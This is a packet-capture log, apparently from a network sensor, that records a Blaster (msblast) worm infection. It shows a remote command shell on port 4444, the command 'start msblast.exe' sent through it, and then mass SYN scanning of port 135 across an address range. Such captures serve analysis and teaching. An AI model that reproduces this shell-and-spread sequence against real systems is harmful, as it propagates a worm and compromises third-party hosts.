137.189.99.200:4444 -> 205.186.81.25:1060 TCP TTL:128 TOS:0x0 ID:130 IpLen:20 DgmLen:58 DF ***AP*** Seq: 0xB15C91E Ack: 0xCA1A3C93 Win: 0xFAB8 TcpLen: 20 start msblast.exe. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ Start the worm and scan other target 08/15-11:17:41.859729 137.189.99.200:1031 -> 168.235.185.1:135 TCP TTL:128 TOS:0x0 ID:131 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB4B518E Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:41.859735 137.189.99.200:1032 -> 168.235.185.2:135 TCP TTL:128 TOS:0x0 ID:132 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB4BD7BB Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:41.861825 137.189.99.200:1033 -> 168.235.185.3:135 TCP TTL:128 TOS:0x0 ID:133 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB4CCEF8 Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:41.861827 137.189.99.200:1034 -> 168.235.185.4:135 TCP TTL:128 TOS:0x0 ID:134 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB4D912F Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:41.861832 137.189.99.200:1035 -> 168.235.185.5:135 TCP TTL:128 TOS:0x0 ID:135 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB4E32C3 Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:41.861833 137.189.99.200:1036 -> 168.235.185.6:135 TCP TTL:128 TOS:0x0 ID:136 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB4ECBAD Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:41.861835 137.189.99.200:1037 -> 168.235.185.7:135 TCP TTL:128 TOS:0x0 ID:137 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB4FC5B1 Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:41.862291 137.189.99.200:1038 -> 168.235.185.8:135 TCP TTL:128 TOS:0x0 ID:138 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB50AC9D Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:41.862391 137.189.99.200:1039 -> 168.235.185.9:135 TCP TTL:128 TOS:0x0 ID:139 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB51895C Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:41.862761 137.189.99.200:1040 -> 168.235.185.10:135 TCP TTL:128 TOS:0x0 ID:140 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB5228C9 Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:41.863186 137.189.99.200:1041 -> 168.235.185.11:135 TCP TTL:128 TOS:0x0 ID:141 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB531A35 Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:41.863551 137.189.99.200:1042 -> 168.235.185.12:135 TCP TTL:128 TOS:0x0 ID:142 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB53FC0B Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:41.863919 137.189.99.200:1043 -> 168.235.185.13:135 TCP TTL:128 TOS:0x0 ID:143 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB54D813 Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:41.864291 137.189.99.200:1044 -> 168.235.185.14:135 TCP TTL:128 TOS:0x0 ID:144 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB555A9F Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:41.864650 137.189.99.200:1045 -> 168.235.185.15:135 TCP TTL:128 TOS:0x0 ID:145 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB56204B Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:41.865016 137.189.99.200:1046 -> 168.235.185.16:135 TCP TTL:128 TOS:0x0 ID:146 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB56D655 Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:41.865427 137.189.99.200:1047 -> 168.235.185.17:135 TCP TTL:128 TOS:0x0 ID:147 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB5787FE Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:41.865805 137.189.99.200:1048 -> 168.235.185.18:135 TCP TTL:128 TOS:0x0 ID:148 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB582BA5 Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:41.866181 137.189.99.200:1049 -> 168.235.185.19:135 TCP TTL:128 TOS:0x0 ID:149 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB591945 Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:41.867510 137.189.99.200:1050 -> 168.235.185.20:135 TCP TTL:128 TOS:0x0 ID:150 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB59A94F Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:42.195271 205.186.81.25:1060 -> 137.189.99.200:4444 TCP TTL:111 TOS:0x0 ID:57047 IpLen:20 DgmLen:40 DF ***A**** Seq: 0xCA1A3C93 Ack: 0xB15C930 Win: 0x15DD TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:42.195489 137.189.99.200:4444 -> 205.186.81.25:1060 TCP TTL:128 TOS:0x0 ID:151 IpLen:20 DgmLen:62 DF ***AP*** Seq: 0xB15C930 Ack: 0xCA1A3C93 Win: 0xFAB8 TcpLen: 20 ..C:\WINDOWS\system32> =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:42.808325 205.186.81.25:1060 -> 137.189.99.200:4444 TCP TTL:111 TOS:0x0 ID:57048 IpLen:20 DgmLen:40 DF ***A**** Seq: 0xCA1A3C93 Ack: 0xB15C946 Win: 0x15C7 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:43.548664 205.186.81.25:1060 -> 137.189.99.200:4444 TCP TTL:111 TOS:0x0 ID:57049 IpLen:20 DgmLen:52 DF ***AP*** Seq: 0xCA1A3C93 Ack: 0xB15C946 Win: 0x15C7 TcpLen: 20 msblast.exe. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:43.549121 137.189.99.200:4444 -> 205.186.81.25:1060 TCP TTL:128 TOS:0x0 ID:152 IpLen:20 DgmLen:52 DF ***AP*** Seq: 0xB15C946 Ack: 0xCA1A3C9F Win: 0xFAAC TcpLen: 20 msblast.exe. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:43.669789 137.189.99.200:1051 -> 168.235.185.21:135 TCP TTL:128 TOS:0x0 ID:153 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB61673E Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:43.670169 137.189.99.200:1052 -> 168.235.185.22:135 TCP TTL:128 TOS:0x0 ID:154 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB622357 Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:43.670504 137.189.99.200:1053 -> 168.235.185.23:135 TCP TTL:128 TOS:0x0 ID:155 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB62AC08 Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:43.670843 137.189.99.200:1054 -> 168.235.185.24:135 TCP TTL:128 TOS:0x0 ID:156 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB632D9F Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:43.671172 137.189.99.200:1055 -> 168.235.185.25:135 TCP TTL:128 TOS:0x0 ID:157 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB63F7DB Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:43.671516 137.189.99.200:1056 -> 168.235.185.26:135 TCP TTL:128 TOS:0x0 ID:158 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB64D966 Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:43.671860 137.189.99.200:1057 -> 168.235.185.27:135 TCP TTL:128 TOS:0x0 ID:159 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB6583DE Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:43.672201 137.189.99.200:1058 -> 168.235.185.28:135 TCP TTL:128 TOS:0x0 ID:160 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB6683B4 Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:43.672547 137.189.99.200:1059 -> 168.235.185.29:135 TCP TTL:128 TOS:0x0 ID:161 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB674CC2 Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:43.672895 137.189.99.200:1060 -> 168.235.185.30:135 TCP TTL:128 TOS:0x0 ID:162 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB682232 Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:43.673249 137.189.99.200:1061 -> 168.235.185.31:135 TCP TTL:128 TOS:0x0 ID:163 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB690691 Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:43.674955 137.189.99.200:1062 -> 168.235.185.32:135 TCP TTL:128 TOS:0x0 ID:164 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB69EF12 Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:43.674959 137.189.99.200:1063 -> 168.235.185.33:135 TCP TTL:128 TOS:0x0 ID:165 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB6A9E10 Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:43.674975 137.189.99.200:1064 -> 168.235.185.34:135 TCP TTL:128 TOS:0x0 ID:166 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB6B8EDC Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:43.674981 137.189.99.200:1065 -> 168.235.185.35:135 TCP TTL:128 TOS:0x0 ID:167 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB6C0EF8 Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:43.675472 137.189.99.200:1067 -> 168.235.185.37:135 TCP TTL:128 TOS:0x0 ID:169 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB6D31A2 Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:43.675855 137.189.99.200:1068 -> 168.235.185.38:135 TCP TTL:128 TOS:0x0 ID:170 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB6DB5DE Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:43.675193 137.189.99.200:1066 -> 168.235.185.36:135 TCP TTL:128 TOS:0x0 ID:168 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB6CA6A5 Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:43.677565 137.189.99.200:1069 -> 168.235.185.39:135 TCP TTL:128 TOS:0x0 ID:171 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB6E624C Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:43.677578 137.189.99.200:1070 -> 168.235.185.40:135 TCP TTL:128 TOS:0x0 ID:172 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB6F6213 Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:44.212281 205.186.81.25:1060 -> 137.189.99.200:4444 TCP TTL:111 TOS:0x0 ID:57050 IpLen:20 DgmLen:40 DF ***A**** Seq: 0xCA1A3C9F Ack: 0xB15C952 Win: 0x15BB TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:44.212541 137.189.99.200:4444 -> 205.186.81.25:1060 TCP TTL:128 TOS:0x0 ID:173 IpLen:20 DgmLen:62 DF ***AP*** Seq: 0xB15C952 Ack: 0xCA1A3C9F Win: 0xFAAC TcpLen: 20 ..C:\WINDOWS\system32> =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:44.814510 205.186.81.25:1060 -> 137.189.99.200:4444 TCP TTL:111 TOS:0x0 ID:57051 IpLen:20 DgmLen:40 DF ***A**** Seq: 0xCA1A3C9F Ack: 0xB15C968 Win: 0x15A5 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:45.482078 137.189.99.200:1071 -> 168.235.185.41:135 TCP TTL:128 TOS:0x0 ID:174 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB76F9E2 Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:45.482457 137.189.99.200:1072 -> 168.235.185.42:135 TCP TTL:128 TOS:0x0 ID:175 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB77AF65 Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:45.482787 137.189.99.200:1073 -> 168.235.185.43:135 TCP TTL:128 TOS:0x0 ID:176 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB78508B Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:45.485003 137.189.99.200:1074 -> 168.235.185.44:135 TCP TTL:128 TOS:0x0 ID:177 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB794058 Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:45.485009 137.189.99.200:1075 -> 168.235.185.45:135 TCP TTL:128 TOS:0x0 ID:178 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB7A3DCF Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:45.485013 137.189.99.200:1076 -> 168.235.185.46:135 TCP TTL:128 TOS:0x0 ID:179 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB7B01A9 Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:45.485021 137.189.99.200:1077 -> 168.235.185.47:135 TCP TTL:128 TOS:0x0 ID:180 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB7B92A7 Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:45.485026 137.189.99.200:1078 -> 168.235.185.48:135 TCP TTL:128 TOS:0x0 ID:181 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB7C6700 Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:45.485032 137.189.99.200:1079 -> 168.235.185.49:135 TCP TTL:128 TOS:0x0 ID:182 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB7CF19E Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:45.485038 137.189.99.200:1080 -> 168.235.185.50:135 TCP TTL:128 TOS:0x0 ID:183 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB7DE86B Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:45.485388 137.189.99.200:1081 -> 168.235.185.51:135 TCP TTL:128 TOS:0x0 ID:184 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB7E906C Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:45.485762 137.189.99.200:1082 -> 168.235.185.52:135 TCP TTL:128 TOS:0x0 ID:185 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB7F7FCE Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:45.487634 137.189.99.200:1083 -> 168.235.185.53:135 TCP TTL:128 TOS:0x0 ID:186 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB805EF8 Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:45.487644 137.189.99.200:1084 -> 168.235.185.54:135 TCP TTL:128 TOS:0x0 ID:187 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB8142D9 Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:45.487649 137.189.99.200:1085 -> 168.235.185.55:135 TCP TTL:128 TOS:0x0 ID:188 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB82020C Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:45.487654 137.189.99.200:1086 -> 168.235.185.56:135 TCP TTL:128 TOS:0x0 ID:189 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB82CE5C Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:45.487658 137.189.99.200:1087 -> 168.235.185.57:135 TCP TTL:128 TOS:0x0 ID:190 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB83AE89 Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:45.488298 137.189.99.200:1089 -> 168.235.185.59:135 TCP TTL:128 TOS:0x0 ID:192 IpLen:20 DgmLen:48 DF ******S* Seq: 0xB851069 Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/15-11:17:45.487880 137.189.99.200:1088 -> 168.235.185.58:135 TCP TTL:128 TOS:0x0 ID:191 IpLen:20 